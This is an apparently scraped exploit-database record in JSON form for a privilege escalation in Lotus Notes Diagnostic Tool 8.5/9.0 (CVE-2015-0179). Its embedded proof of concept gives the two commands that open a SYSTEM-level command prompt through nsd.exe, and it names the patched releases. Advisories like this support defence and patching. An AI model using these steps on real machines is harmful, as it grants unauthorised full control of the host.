Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation Vulnerability

2017-09-04T00:00:00

Description

Exploit for windows platform in category local exploits

{"id": "1337DAY-ID-28417", "type": "zdt", "bulletinFamily": "exploit", "title": "Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation Vulnerability", "description": "Exploit for windows platform in category local exploits", "published": "2017-09-04T00:00:00", "modified": "2017-09-04T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/28417", "reporter": "ParagonSec", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-09T05:22:27", "viewCount": 9, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2015-0179"]}]}, "exploitation": null, "vulnersScore": -0.3}, "sourceHref": "https://0day.today/exploit/28417", "sourceData": "# Exploit Title: Lotus Notes Diagnostic Tool (nsd.exe) Privelege Escalation\r\n# Date: 02-09-2017\r\n# Exploit Author: ParagonSec\r\n# Website: https://github.com/paragonsec\r\n# Version: 8.5 & 9.0\r\n# Tested on: Windows 7 Enterprise\r\n# CVE: CVE-2015-0179\r\n# Vendor CVE URL: http://www-01.ibm.com/support/docview.wss?uid=swg21700029\r\n# Category: Local & Privilege Escalation Exploit\r\n\r\n\r\n1. Description\r\n\r\nLotus Notes Diagnostic Tool (nsd.exe) runs under NT Authority/System rights.\r\nThis can be leveraged to run a program under the System context and elevate\r\nlocal privileges.\r\n\r\n\r\n2. Proof of Concept\r\n\r\nFirst you need to execute nsd.exe under the monitor/CLI mode:\r\n\r\n> nsd.exe -monitor\r\n\r\nNext, after NSD finishes loading you can execute any program under the System context. In this example we will execute CMD.\r\n\r\nnsd> LOAD CMD\r\n\r\nYou will see that cmd is opened as System now.\r\n\r\nAlso, NSD can be used to attach, kill processes or create memory dumps under the System context.\r\n\r\n\r\n3. Solution:\r\n\r\nThis has been fixed on release 9.0.1 FP3 and 8.5.3 FP6.\n\n# 0day.today [2018-02-09] #", "_state": {"dependencies": 1659958664, "score": 1659788215, "epss": 1678853679}}